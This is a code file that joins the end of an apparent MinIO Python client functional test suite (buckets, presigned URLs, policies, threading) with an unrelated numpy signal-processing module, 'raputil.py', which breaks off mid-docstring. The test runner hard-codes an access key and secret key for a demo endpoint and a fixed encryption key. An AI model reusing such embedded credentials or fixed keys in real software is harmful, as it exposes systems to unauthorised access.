"object_name": object_name,
"offset": offset
}
_CLIENT.make_bucket(bucket_name)
try:
_CLIENT.put_object(bucket_name, object_name,
LimitedRandomReader(size), size, sse=sse)
# Get half of the object
object_data = _CLIENT.get_object(bucket_name, object_name,
offset=offset, length=length, sse=sse)
newfile = 'newfile'
with open(newfile, 'wb') as file_data:
for data in object_data:
file_data.write(data)
# Check if the new file is the right size
new_file_size = os.path.getsize(newfile)
os.remove(newfile)
if new_file_size != length:
raise ValueError('Unexpected file size after running ')
finally:
_CLIENT.remove_object(bucket_name, object_name)
_CLIENT.remove_bucket(bucket_name)
def _test_list_objects(log_entry, use_api_v1=False, version_check=False):
"""Test list_objects()."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
is_recursive = True
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
"recursive": is_recursive,
}
_CLIENT.make_bucket(bucket_name)
version_id1 = None
version_id2 = None
try:
if version_check:
_CLIENT.set_bucket_versioning(
bucket_name, VersioningConfig(ENABLED),
)
size = 1 * KB
result = _CLIENT.put_object(
bucket_name, object_name + "-1", LimitedRandomReader(size), size,
)
version_id1 = result.version_id
result = _CLIENT.put_object(
bucket_name, object_name + "-2", LimitedRandomReader(size), size,
)
version_id2 = result.version_id
# List all object paths in bucket.
objects = _CLIENT.list_objects(
bucket_name, '', is_recursive, include_version=version_check,
use_api_v1=use_api_v1,
)
for obj in objects:
_ = (obj.bucket_name, obj.object_name, obj.last_modified,
obj.etag, obj.size, obj.content_type)
if obj.version_id not in [version_id1, version_id2]:
raise ValueError(
"version ID mismatch. expected=any{0}, got:{1}".format(
[version_id1, version_id2], obj.verion_id,
)
)
finally:
_CLIENT.remove_object(
bucket_name, object_name + "-1", version_id=version_id1,
)
_CLIENT.remove_object(
bucket_name, object_name + "-2", version_id=version_id2,
)
_CLIENT.remove_bucket(bucket_name)
def test_list_objects_v1(log_entry):
"""Test list_objects()."""
_test_list_objects(log_entry, use_api_v1=True)
def test_list_object_v1_versions(log_entry):
"""Test list_objects()."""
_test_list_objects(log_entry, use_api_v1=True, version_check=True)
def _test_list_objects_api(bucket_name, expected_no, *argv):
"""Test list_objects()."""
# argv is composed of prefix and recursive arguments of
# list_objects api. They are both supposed to be passed as strings.
objects = _CLIENT.list_objects(bucket_name, *argv)
# expect all objects to be listed
no_of_files = 0
for obj in objects:
_ = (obj.bucket_name, obj.object_name, obj.last_modified, obj.etag,
obj.size, obj.content_type)
no_of_files += 1
if expected_no != no_of_files:
raise ValueError(
("Listed no of objects ({}), does not match the "
"expected no of objects ({})").format(no_of_files, expected_no))
def test_list_objects_with_prefix(log_entry):
"""Test list_objects() with prefix."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
}
_CLIENT.make_bucket(bucket_name)
try:
size = 1 * KB
no_of_created_files = 4
path_prefix = ""
# Create files and directories
for i in range(no_of_created_files):
_CLIENT.put_object(bucket_name,
"{0}{1}_{2}".format(
path_prefix,
i,
object_name,
),
LimitedRandomReader(size), size)
path_prefix = "{0}{1}/".format(path_prefix, i)
# Created files and directory structure
# ._<bucket_name>/
# |___0_<object_name>
# |___0/
# |___1_<object_name>
# |___1/
# |___2_<object_name>
# |___2/
# |___3_<object_name>
#
# Test and verify list_objects api outputs
# List objects recursively with NO prefix
log_entry["args"]["prefix"] = prefix = "" # no prefix
log_entry["args"]["recursive"] = recursive = ""
_test_list_objects_api(bucket_name, no_of_created_files, prefix, True)
# List objects at the top level with no prefix and no recursive option
# Expect only the top 2 objects to be listed
_test_list_objects_api(bucket_name, 2)
# List objects for '0' directory/prefix without recursive option
# Expect 2 object (directory '0' and '0_' object) to be listed
log_entry["args"]["prefix"] = prefix = "0"
_test_list_objects_api(bucket_name, 2, prefix)
# List objects for '0/' directory/prefix without recursive option
# Expect only 2 objects under directory '0/' to be listed,
# non-recursive
log_entry["args"]["prefix"] = prefix = "0/"
_test_list_objects_api(bucket_name, 2, prefix)
# List objects for '0/' directory/prefix, recursively
# Expect 2 objects to be listed
log_entry["args"]["prefix"] = prefix = "0/"
log_entry["args"]["recursive"] = recursive = "True"
_test_list_objects_api(bucket_name, 3, prefix, recursive)
# List object with '0/1/2/' directory/prefix, non-recursive
# Expect the single object under directory '0/1/2/' to be listed
log_entry["args"]["prefix"] = prefix = "0/1/2/"
_test_list_objects_api(bucket_name, 1, prefix)
finally:
path_prefix = ""
for i in range(no_of_created_files):
_CLIENT.remove_object(
bucket_name,
"{0}{1}_{2}".format(path_prefix, i, object_name))
path_prefix = "{0}{1}/".format(path_prefix, i)
_CLIENT.remove_bucket(bucket_name)
# Test passes
log_entry["args"]["prefix"] = (
"Several prefix/recursive combinations are tested")
log_entry["args"]["recursive"] = (
'Several prefix/recursive combinations are tested')
def test_list_objects_with_1001_files( # pylint: disable=invalid-name
log_entry):
"""Test list_objects() with more 1000 objects."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": "{0}_0 ~ {0}_1000".format(object_name),
}
_CLIENT.make_bucket(bucket_name)
try:
size = 1 * KB
no_of_created_files = 2000
# Create files and directories
for i in range(no_of_created_files):
_CLIENT.put_object(bucket_name,
"{0}_{1}".format(object_name, i),
LimitedRandomReader(size), size)
# List objects and check if 1001 files are returned
_test_list_objects_api(bucket_name, no_of_created_files)
finally:
for i in range(no_of_created_files):
_CLIENT.remove_object(bucket_name,
"{0}_{1}".format(object_name, i))
_CLIENT.remove_bucket(bucket_name)
def test_list_objects(log_entry):
"""Test list_objects()."""
_test_list_objects(log_entry)
def test_list_object_versions(log_entry):
"""Test list_objects() of versioned object."""
_test_list_objects(log_entry, version_check=True)
def test_presigned_get_object_default_expiry( # pylint: disable=invalid-name
log_entry):
"""Test presigned_get_object() with default expiry."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
}
_CLIENT.make_bucket(bucket_name)
try:
size = 1 * KB
_CLIENT.put_object(bucket_name, object_name, LimitedRandomReader(size),
size)
presigned_get_object_url = _CLIENT.presigned_get_object(
bucket_name, object_name)
response = HTTP.urlopen('GET', presigned_get_object_url)
if response.status != 200:
raise Exception(
(
"Presigned GET object URL {0} failed; "
"code: {1}, error: {2}"
).format(
presigned_get_object_url, response.code, response.data,
),
)
finally:
_CLIENT.remove_object(bucket_name, object_name)
_CLIENT.remove_bucket(bucket_name)
def test_presigned_get_object_expiry( # pylint: disable=invalid-name
log_entry):
"""Test presigned_get_object() with expiry."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
}
_CLIENT.make_bucket(bucket_name)
try:
size = 1 * KB
_CLIENT.put_object(bucket_name, object_name, LimitedRandomReader(size),
size)
presigned_get_object_url = _CLIENT.presigned_get_object(
bucket_name, object_name, timedelta(seconds=120))
response = HTTP.urlopen('GET', presigned_get_object_url)
if response.status != 200:
raise Exception(
(
"Presigned GET object URL {0} failed; "
"code: {1}, error: {2}"
).format(
presigned_get_object_url, response.code, response.data,
),
)
log_entry["args"]["presigned_get_object_url"] = (
presigned_get_object_url)
response = HTTP.urlopen('GET', presigned_get_object_url)
log_entry["args"]['response.status'] = response.status
log_entry["args"]['response.reason'] = response.reason
log_entry["args"]['response.headers'] = json.dumps(
response.headers.__dict__)
# pylint: disable=protected-access
log_entry["args"]['response._body'] = response._body.decode('utf-8')
if response.status != 200:
raise Exception(
(
"Presigned GET object URL {0} failed; "
"code: {1}, error: {2}"
).format(
presigned_get_object_url, response.code, response.data,
),
)
presigned_get_object_url = _CLIENT.presigned_get_object(
bucket_name, object_name, timedelta(seconds=1))
# Wait for 2 seconds for the presigned url to expire
time.sleep(2)
response = HTTP.urlopen('GET', presigned_get_object_url)
log_entry["args"]['response.status-2'] = response.status
log_entry["args"]['response.reason-2'] = response.reason
log_entry["args"]['response.headers-2'] = json.dumps(
response.headers.__dict__)
log_entry["args"]['response._body-2'] = response._body.decode('utf-8')
# Success with an expired url is considered to be a failure
if response.status == 200:
raise ValueError('Presigned get url failed to expire!')
finally:
_CLIENT.remove_object(bucket_name, object_name)
_CLIENT.remove_bucket(bucket_name)
def test_presigned_get_object_response_headers( # pylint: disable=invalid-name
log_entry):
"""Test presigned_get_object() with headers."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
content_type = 'text/plain'
content_language = 'en_US'
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
"content_type": content_type,
"content_language": content_language,
}
_CLIENT.make_bucket(bucket_name)
try:
size = 1 * KB
_CLIENT.put_object(bucket_name, object_name, LimitedRandomReader(size),
size)
presigned_get_object_url = _CLIENT.presigned_get_object(
bucket_name, object_name, timedelta(seconds=120))
response_headers = {
'response-content-type': content_type,
'response-content-language': content_language
}
presigned_get_object_url = _CLIENT.presigned_get_object(
bucket_name, object_name, timedelta(seconds=120), response_headers)
log_entry["args"]["presigned_get_object_url"] = (
presigned_get_object_url)
response = HTTP.urlopen('GET', presigned_get_object_url)
returned_content_type = response.headers['Content-Type']
returned_content_language = response.headers['Content-Language']
log_entry["args"]['response.status'] = response.status
log_entry["args"]['response.reason'] = response.reason
log_entry["args"]['response.headers'] = json.dumps(
response.headers.__dict__)
# pylint: disable=protected-access
log_entry["args"]['response._body'] = response._body.decode('utf-8')
log_entry["args"]['returned_content_type'] = returned_content_type
log_entry["args"]['returned_content_language'] = (
returned_content_language)
if (response.status != 200 or
returned_content_type != content_type or
returned_content_language != content_language):
raise Exception(
(
"Presigned GET object URL {0} failed; "
"code: {1}, error: {2}"
).format(
presigned_get_object_url, response.code, response.data,
),
)
finally:
_CLIENT.remove_object(bucket_name, object_name)
_CLIENT.remove_bucket(bucket_name)
def test_presigned_get_object_version( # pylint: disable=invalid-name
log_entry):
"""Test presigned_get_object() of versioned object."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
}
_CLIENT.make_bucket(bucket_name)
version_id = None
try:
_CLIENT.set_bucket_versioning(bucket_name, VersioningConfig(ENABLED))
size = 1 * KB
result = _CLIENT.put_object(
bucket_name, object_name, LimitedRandomReader(size), size,
)
version_id = result.version_id
presigned_get_object_url = _CLIENT.presigned_get_object(
bucket_name, object_name, version_id=version_id,
)
response = HTTP.urlopen('GET', presigned_get_object_url)
if response.status != 200:
raise Exception(
(
"Presigned GET object URL {0} failed; "
"code: {1}, error: {2}"
).format(
presigned_get_object_url, response.code, response.data,
),
)
finally:
_CLIENT.remove_object(bucket_name, object_name, version_id=version_id)
_CLIENT.remove_bucket(bucket_name)
def test_presigned_put_object_default_expiry( # pylint: disable=invalid-name
log_entry):
"""Test presigned_put_object() with default expiry."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
}
_CLIENT.make_bucket(bucket_name)
try:
presigned_put_object_url = _CLIENT.presigned_put_object(
bucket_name, object_name)
response = HTTP.urlopen('PUT',
presigned_put_object_url,
LimitedRandomReader(1 * KB))
if response.status != 200:
raise Exception(
(
"Presigned PUT object URL {0} failed; "
"code: {1}, error: {2}"
).format(
presigned_put_object_url, response.code, response.data,
),
)
_CLIENT.stat_object(bucket_name, object_name)
finally:
_CLIENT.remove_object(bucket_name, object_name)
_CLIENT.remove_bucket(bucket_name)
def test_presigned_put_object_expiry( # pylint: disable=invalid-name
log_entry):
"""Test presigned_put_object() with expiry."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
}
_CLIENT.make_bucket(bucket_name)
try:
presigned_put_object_url = _CLIENT.presigned_put_object(
bucket_name, object_name, timedelta(seconds=1))
# Wait for 2 seconds for the presigned url to expire
time.sleep(2)
response = HTTP.urlopen('PUT',
presigned_put_object_url,
LimitedRandomReader(1 * KB))
if response.status == 200:
raise ValueError('Presigned put url failed to expire!')
finally:
_CLIENT.remove_object(bucket_name, object_name)
_CLIENT.remove_bucket(bucket_name)
def test_presigned_post_policy(log_entry):
"""Test presigned_post_policy()."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
log_entry["args"] = {
"bucket_name": bucket_name,
}
_CLIENT.make_bucket(bucket_name)
try:
no_of_days = 10
prefix = 'objectPrefix/'
# Post policy.
policy = PostPolicy()
policy.set_bucket_name(bucket_name)
policy.set_key_startswith(prefix)
expires_date = datetime.utcnow() + timedelta(days=no_of_days)
policy.set_expires(expires_date)
# post_policy arg is a class. To avoid displaying meaningless value
# for the class, policy settings are made part of the args for
# clarity and debugging purposes.
log_entry["args"]["post_policy"] = {'prefix': prefix,
'expires_in_days': no_of_days}
_CLIENT.presigned_post_policy(policy)
finally:
_CLIENT.remove_bucket(bucket_name)
def test_thread_safe(log_entry):
"""Test thread safety."""
# Create sha-sum value for the user provided
# source file, 'test_file'
test_file_sha_sum = _get_sha256sum(_LARGE_FILE)
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
}
# A list of exceptions raised by get_object_and_check
# called in multiple threads.
exceptions = []
# get_object_and_check() downloads an object, stores it in a file
# and then calculates its checksum. In case of mismatch, a new
# exception is generated and saved in exceptions.
def get_object_and_check(index):
try:
local_file = "copied_file_{0}".format(index)
_CLIENT.fget_object(bucket_name, object_name, local_file)
copied_file_sha_sum = _get_sha256sum(local_file)
# Compare sha-sum values of the source file and the copied one
if test_file_sha_sum != copied_file_sha_sum:
raise ValueError(
'Sha-sum mismatch on multi-threaded put and '
'get objects')
except Exception as exc: # pylint: disable=broad-except
exceptions.append(exc)
finally:
# Remove downloaded file
_ = os.path.isfile(local_file) and os.remove(local_file)
_CLIENT.make_bucket(bucket_name)
no_of_threads = 5
try:
# Put/Upload 'no_of_threads' many objects
# simultaneously using multi-threading
for _ in range(no_of_threads):
thread = Thread(target=_CLIENT.fput_object,
args=(bucket_name, object_name, _LARGE_FILE))
thread.start()
thread.join()
# Get/Download 'no_of_threads' many objects
# simultaneously using multi-threading
thread_list = []
for i in range(no_of_threads):
# Create dynamic/varying names for to be created threads
thread_name = 'thread_{0}'.format(i)
vars()[thread_name] = Thread(
target=get_object_and_check, args=(i,))
vars()[thread_name].start()
thread_list.append(vars()[thread_name])
# Wait until all threads to finish
for thread in thread_list:
thread.join()
if exceptions:
raise exceptions[0]
finally:
_CLIENT.remove_object(bucket_name, object_name)
_CLIENT.remove_bucket(bucket_name)
def test_get_bucket_policy(log_entry):
"""Test get_bucket_policy()."""
# Get a unique bucket_name
bucket_name = _gen_bucket_name()
log_entry["args"] = {
"bucket_name": bucket_name,
}
_CLIENT.make_bucket(bucket_name)
try:
_CLIENT.get_bucket_policy(bucket_name)
except S3Error as exc:
if exc.code != "NoSuchBucketPolicy":
raise
finally:
_CLIENT.remove_bucket(bucket_name)
def _get_policy_actions(stat):
"""Get policy actions from stat information."""
def listit(value):
return value if isinstance(value, list) else [value]
actions = [listit(s.get("Action")) for s in stat if s.get("Action")]
actions = list(set(
item.replace("s3:", "") for sublist in actions for item in sublist
))
actions.sort()
return actions
def _validate_policy(bucket_name, policy):
"""Validate policy."""
policy_dict = json.loads(_CLIENT.get_bucket_policy(bucket_name))
actions = _get_policy_actions(policy_dict.get('Statement'))
expected_actions = _get_policy_actions(policy.get('Statement'))
return expected_actions == actions
def test_get_bucket_notification(log_entry):
"""Test get_bucket_notification()."""
# Get a unique bucket_name
bucket_name = _gen_bucket_name()
log_entry["args"] = {
"bucket_name": bucket_name,
}
_CLIENT.make_bucket(bucket_name)
try:
config = _CLIENT.get_bucket_notification(bucket_name)
if (
config.cloud_func_config_list or config.queue_config_list or
config.topic_config_list
):
raise ValueError("Failed to receive an empty bucket notification")
finally:
_CLIENT.remove_bucket(bucket_name)
def test_set_bucket_policy_readonly(log_entry):
"""Test set_bucket_policy() with readonly policy."""
# Get a unique bucket_name
bucket_name = _gen_bucket_name()
log_entry["args"] = {
"bucket_name": bucket_name,
}
_CLIENT.make_bucket(bucket_name)
try:
# read-only policy
policy = {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetBucketLocation",
"Resource": "arn:aws:s3:::" + bucket_name
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::" + bucket_name
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::{0}/*".format(bucket_name)
}
]
}
# Set read-only policy
_CLIENT.set_bucket_policy(bucket_name, json.dumps(policy))
# Validate if the policy is set correctly
if not _validate_policy(bucket_name, policy):
raise ValueError('Failed to set ReadOnly bucket policy')
finally:
_CLIENT.remove_bucket(bucket_name)
def test_set_bucket_policy_readwrite( # pylint: disable=invalid-name
log_entry):
"""Test set_bucket_policy() with read/write policy."""
# Get a unique bucket_name
bucket_name = _gen_bucket_name()
log_entry["args"] = {
"bucket_name": bucket_name,
}
_CLIENT.make_bucket(bucket_name)
try:
# Read-write policy
policy = {
"Version": "2012-10-17",
"Statement": [
{
"Action": ["s3:GetBucketLocation"],
"Sid": "",
"Resource": ["arn:aws:s3:::" + bucket_name],
"Effect": "Allow",
"Principal": {"AWS": "*"}
},
{
"Action": ["s3:ListBucket"],
"Sid": "",
"Resource": ["arn:aws:s3:::" + bucket_name],
"Effect": "Allow",
"Principal": {"AWS": "*"}
},
{
"Action": ["s3:ListBucketMultipartUploads"],
"Sid": "",
"Resource": ["arn:aws:s3:::" + bucket_name],
"Effect": "Allow",
"Principal": {"AWS": "*"}
},
{
"Action": ["s3:ListMultipartUploadParts",
"s3:GetObject",
"s3:AbortMultipartUpload",
"s3:DeleteObject",
"s3:PutObject"],
"Sid": "",
"Resource": ["arn:aws:s3:::{0}/*".format(bucket_name)],
"Effect": "Allow",
"Principal": {"AWS": "*"}
}
]
}
# Set read-write policy
_CLIENT.set_bucket_policy(bucket_name, json.dumps(policy))
# Validate if the policy is set correctly
if not _validate_policy(bucket_name, policy):
raise ValueError('Failed to set ReadOnly bucket policy')
finally:
_CLIENT.remove_bucket(bucket_name)
def _test_remove_objects(log_entry, version_check=False):
"""Test remove_objects()."""
# Get a unique bucket_name
bucket_name = _gen_bucket_name()
log_entry["args"] = {
"bucket_name": bucket_name,
}
_CLIENT.make_bucket(bucket_name)
object_names = []
try:
if version_check:
_CLIENT.set_bucket_versioning(
bucket_name, VersioningConfig(ENABLED),
)
size = 1 * KB
# Upload some new objects to prepare for multi-object delete test.
for i in range(10):
object_name = "prefix-{0}".format(i)
result = _CLIENT.put_object(
bucket_name, object_name, LimitedRandomReader(size), size,
)
object_names.append(
(object_name, result.version_id) if version_check
else object_name,
)
log_entry["args"]["delete_object_list"] = object_names
delete_object_list = []
for args in object_names:
delete_object_list.append(
DeleteObject(args) if isinstance(args, str)
else DeleteObject(args[0], args[1])
)
# delete the objects in a single library call.
errs = _CLIENT.remove_objects(bucket_name, delete_object_list)
for err in errs:
raise ValueError("Remove objects err: {}".format(err))
finally:
# Try to clean everything to keep our server intact
errs = _CLIENT.remove_objects(bucket_name, delete_object_list)
for err in errs:
raise ValueError("Remove objects err: {}".format(err))
_CLIENT.remove_bucket(bucket_name)
def test_remove_objects(log_entry):
"""Test remove_objects()."""
_test_remove_objects(log_entry)
def test_remove_object_versions(log_entry):
"""Test remove_objects()."""
_test_remove_objects(log_entry, version_check=True)
def test_remove_bucket(log_entry):
"""Test remove_bucket()."""
# Get a unique bucket_name
bucket_name = _gen_bucket_name()
if _IS_AWS:
bucket_name += ".unique"
log_entry["args"] = {
"bucket_name": bucket_name,
}
if _IS_AWS:
log_entry["args"]["location"] = location = "us-east-1"
_CLIENT.make_bucket(bucket_name, location)
else:
_CLIENT.make_bucket(bucket_name)
# Removing bucket. This operation will only work if your bucket is empty.
_CLIENT.remove_bucket(bucket_name)
def main():
"""
Functional testing of minio python library.
"""
# pylint: disable=global-statement
global _CLIENT, _TEST_FILE, _LARGE_FILE, _IS_AWS
access_key = os.getenv('ACCESS_KEY')
secret_key = os.getenv('SECRET_KEY')
server_endpoint = os.getenv('SERVER_ENDPOINT', 'play.min.io')
secure = os.getenv('ENABLE_HTTPS', '1') == '1'
if server_endpoint == 'play.min.io':
access_key = 'Q3AM3UQ867SPQQA43P2F'
secret_key = 'zuf+tfteSlswRu7BJ86wekitnifILbZam1KYY3TG'
secure = True
_CLIENT = Minio(server_endpoint, access_key, secret_key, secure=secure)
_IS_AWS = ".amazonaws.com" in server_endpoint
# Check if we are running in the mint environment.
data_dir = os.getenv('DATA_DIR', '/mint/data')
is_mint_env = (
os.path.exists(data_dir) and
os.path.exists(os.path.join(data_dir, 'datafile-1-MB')) and
os.path.exists(os.path.join(data_dir, 'datafile-11-MB'))
)
# Enable trace
# _CLIENT.trace_on(sys.stderr)
_TEST_FILE = 'datafile-1-MB'
_LARGE_FILE = 'datafile-11-MB'
if is_mint_env:
# Choose data files
_TEST_FILE = os.path.join(data_dir, 'datafile-1-MB')
_LARGE_FILE = os.path.join(data_dir, 'datafile-11-MB')
else:
with open(_TEST_FILE, 'wb') as file_data:
shutil.copyfileobj(LimitedRandomReader(1 * MB), file_data)
with open(_LARGE_FILE, 'wb') as file_data:
shutil.copyfileobj(LimitedRandomReader(11 * MB), file_data)
ssec = None
if secure:
# Create a Customer Key of 32 Bytes for Server Side Encryption (SSE-C)
cust_key = b'AABBCCDDAABBCCDDAABBCCDDAABBCCDD'
# Create an SSE-C object with provided customer key
ssec = SseCustomerKey(cust_key)
if os.getenv("MINT_MODE") == "full":
tests = {
test_make_bucket_default_region: None,
test_make_bucket_with_region: None,
test_negative_make_bucket_invalid_name: None,
test_list_buckets: None,
test_fput_object_small_file: {"sse": ssec} if ssec else None,
test_fput_object_large_file: {"sse": ssec} if ssec else None,
test_fput_object_with_content_type: None,
test_copy_object_no_copy_condition: {
"ssec_copy": ssec, "ssec": ssec} if ssec else None,
test_copy_object_etag_match: None,
test_copy_object_with_metadata: None,
test_copy_object_negative_etag_match: None,
test_copy_object_modified_since: None,
test_copy_object_unmodified_since: None,
test_put_object: {"sse": ssec} if ssec else None,
test_negative_put_object_with_path_segment: None,
test_stat_object: {"sse": ssec} if ssec else None,
test_stat_object_version: {"sse": ssec} if ssec else None,
test_get_object: {"sse": ssec} if ssec else None,
test_get_object_version: {"sse": ssec} if ssec else None,
test_fget_object: {"sse": ssec} if ssec else None,
test_fget_object_version: {"sse": ssec} if ssec else None,
test_get_object_with_default_length: None,
test_get_partial_object: {"sse": ssec} if ssec else None,
test_list_objects_v1: None,
test_list_object_v1_versions: None,
test_list_objects_with_prefix: None,
test_list_objects_with_1001_files: None,
test_list_objects: None,
test_list_object_versions: None,
test_presigned_get_object_default_expiry: None,
test_presigned_get_object_expiry: None,
test_presigned_get_object_response_headers: None,
test_presigned_get_object_version: None,
test_presigned_put_object_default_expiry: None,
test_presigned_put_object_expiry: None,
test_presigned_post_policy: None,
test_thread_safe: None,
test_get_bucket_policy: None,
test_set_bucket_policy_readonly: None,
test_set_bucket_policy_readwrite: None,
test_get_bucket_notification: None,
test_select_object_content: None,
}
else:
tests = {
test_make_bucket_default_region: None,
test_list_buckets: None,
test_put_object: {"sse": ssec} if ssec else None,
test_stat_object: {"sse": ssec} if ssec else None,
test_stat_object_version: {"sse": ssec} if ssec else None,
test_get_object: {"sse": ssec} if ssec else None,
test_get_object_version: {"sse": ssec} if ssec else None,
test_list_objects: None,
test_presigned_get_object_default_expiry: None,
test_presigned_put_object_default_expiry: None,
test_presigned_post_policy: None,
test_copy_object_no_copy_condition: {
"ssec_copy": ssec, "ssec": ssec} if ssec else None,
test_select_object_content: None,
test_get_bucket_policy: None,
test_set_bucket_policy_readonly: None,
test_get_bucket_notification: None,
}
tests.update(
{
test_remove_object: None,
test_remove_object_version: None,
test_remove_objects: None,
test_remove_object_versions: None,
test_remove_bucket: None,
},
)
for test_name, arg_list in tests.items():
args = ()
kwargs = {}
_call_test(test_name, *args, **kwargs)
if arg_list:
args = ()
kwargs = arg_list
_call_test(test_name, *args, **kwargs)
# Remove temporary files.
if not is_mint_env:
os.remove(_TEST_FILE)
os.remove(_LARGE_FILE)
if __name__ == "__main__":
try:
main()
except TestFailed:
sys.exit(1)
except Exception as exc: # pylint: disable=broad-except
print(exc)
sys.exit(-1)
|
raputil.py
|
#!/usr/bin/python
from __future__ import division
import numpy as np
import math
import os
import time
import numpy.linalg as la
from tfinterp import interp1d_
sqrt=np.sqrt
pi = math.pi
def hexagonal_uniform(N,as_complex=False):
'returns uniformly distributed points of shape=(2,N) within a hexagon whose minimum radius is 1.0'
phi = 2*pi/6 *.5
S = np.array( [[1,1],np.tan([phi,-phi])] ) # vectors to vertices of next hexagon ( centered at (2,0) )a
# uniformly sample the parallelogram defined by the columns of S
v = np.matmul(S,np.random.uniform(0,1,(2,N)))
v[0] = 1 - abs(v[0]-1) # fold back to make a triangle
c = (v[0] + 1j*v[1]) * np.exp( 2j*pi/6*np.floor( np.random.uniform(0,6,N) ) ) # rotate to a random sextant
if as_complex:
return c
else:
return np.array( (c.real,c.imag) )
def left_least_squares(x,y,rcond=-1,fast=False):
'find the A that best fits y-A*x'
if fast:
return la.lstsq( np.matmul(x,x.T) ,np.matmul(x,y.T) ,rcond=rcond )[0].T # faster, but less stable
else:
return la.lstsq( x.T,y.T,rcond=rcond)[0].T
def rms(x,axis=None):
'calculate the root-mean-square of a signal, if axis!=None, then reduction will only be along the given axis/axes'
if np.iscomplexobj(x):
x=abs(x)
return np.sqrt(np.mean(np.square(x),axis) )
def nlfunc(r,sc,grid,gg,return_gradient=True):
'returns xhat_nl = rhat_nl * interp( rhat_nl / sc,grid,gg) and optionally the gradient of xhat_nl wrt rhat_nl'
g = r * np.interp(r/sc,grid,gg)
if return_gradient:
#I had some code that computed the gradient, but it was far more complicated and no faster than just computing the empirical gradient
# technically, this computes a subgradient
dr = sc * (grid[1]-grid[0]) * 1e-3
dgdr = (nlfunc(r+.5*dr,sc,grid,gg,False) - nlfunc(r-.5*dr,sc,grid,gg,False)) / dr
return (g,dgdr)
else:
return g
def nlfunc_(r_,sc_,grid,gg_,return_gradient=True):
'returns xhat_nl = rhat_nl * interp( rhat_nl / sc,grid,gg) and optionally the gradient of xhat_nl wrt rhat_nl'
g_ = r_ * interp1d_(r_/sc_,grid,gg_)
if return_gradient:
#I had some code that computed the gradient, but it was far more complicated and no faster than just computing the empirical gradient
# technically, this computes a subgradient
dr_ = sc_ * (grid[1]-grid[0]) * 1e-3
dgdr_ = (nlfunc_(r_+.5*dr_,sc_,grid,gg_,False) - nlfunc_(r_-.5*dr_,sc_,grid,gg_,False)) / dr_
return (g_,dgdr_)
else:
return g_
def crandn(shape,set_mag=None):
'circular symmetric Gaussian with variance 2 (real,imag each being var=1) '
X= np.random.normal( size=tuple(shape)+(2,)).view(np.complex128)[...,0]
if set_mag is not None:
X = X *set_mag / abs(X)
return X
def random_qpsk( *shape):
return ((np.random.uniform( -1,1,size=shape+(2,) ) > 0)*2-1).astype(np.float32).view(np.complex64)[...,0]
class Problem(object):
@staticmethod
def scenario1():
return dict(Nr=1,C=1,Nu=512,Ns=64,beta=.01,SNR_dB=10.0,L=5,ang=10,rice_k_dB=10,ple=4,mmv2d=True,normS=1)
@staticmethod
def scenario2():
return dict(Nr=64,C=7,Nu=64,Ns=64,beta=1,SNR_dB=20.0,L=5,ang=10,rice_k_dB=10,ple=4,mmv2d=True,normS=1)
def __init__(self, Nr=64, C=7, Nu=64, Ns=64, beta=.01,L=5,ang=10,rice_k_dB=10,ple=4,SNR_dB=10.0,ambig=False,scramble=False,S=None,cpx=False,mmv2d=False,normS=None):
"""
Nr : number of Rx antennas
C : number of cells (>1 indicates there are "far" users)
Nu : max # users per cell
Ns : spreading code length
beta : user load (i.e.,expected active / total user ratio)
L : paths per cluster
ang : angular spread within cluster (in degrees)
rice_k_dB : rice k parameter in dB
ple : path-loss exponent: gain = 1/(1+d^ple) for distance d
S : set of spreading codes, shape=(Ns,C*Nu) """
if S is None:
S = random_qpsk(Ns,C*Nu)
self.Nr = Nr
self.C = C
self.Nu = Nu
self.Ns = Ns
self.beta = beta
self.L = L
self.ang = ang
self.rice_k_dB = rice_k_dB
self.ple = ple
self.SNR_dB = SNR_dB
self.ambig = ambig
self.scramble = scramble
self.cpx = cpx
self.mmv2d = mmv2d
if self.cpx == np.iscomplexobj(S):
self.S = S
else:
if not self.cpx:
top = np.concatenate( (S.real, -S.imag),axis=1 )
btm = np.concatenate( (S.imag, S.real),axis=1 )
self.S = np.concatenate( (top,btm),axis=0 )
else:
assert False,'WHY!?'
if self.cpx:
assert self.S.shape == (Ns,C*Nu)
else:
assert self.S.shape == (2*Ns,2*C*Nu)
if normS is not None:
dnorm = np.asarray(normS) / np.sqrt( np.square(self.S).sum(axis=0) )
self.S = self.S * dnorm
self.timegen = 0 # time spent waiting for generation of YX (does NOT count subprocess cpus time if nsubprocs>0
def genX(self,batches=1):
"""generate one or more batches(i.e. random draws) of active users with Ricean channels
batches : number of independent realizations to generate
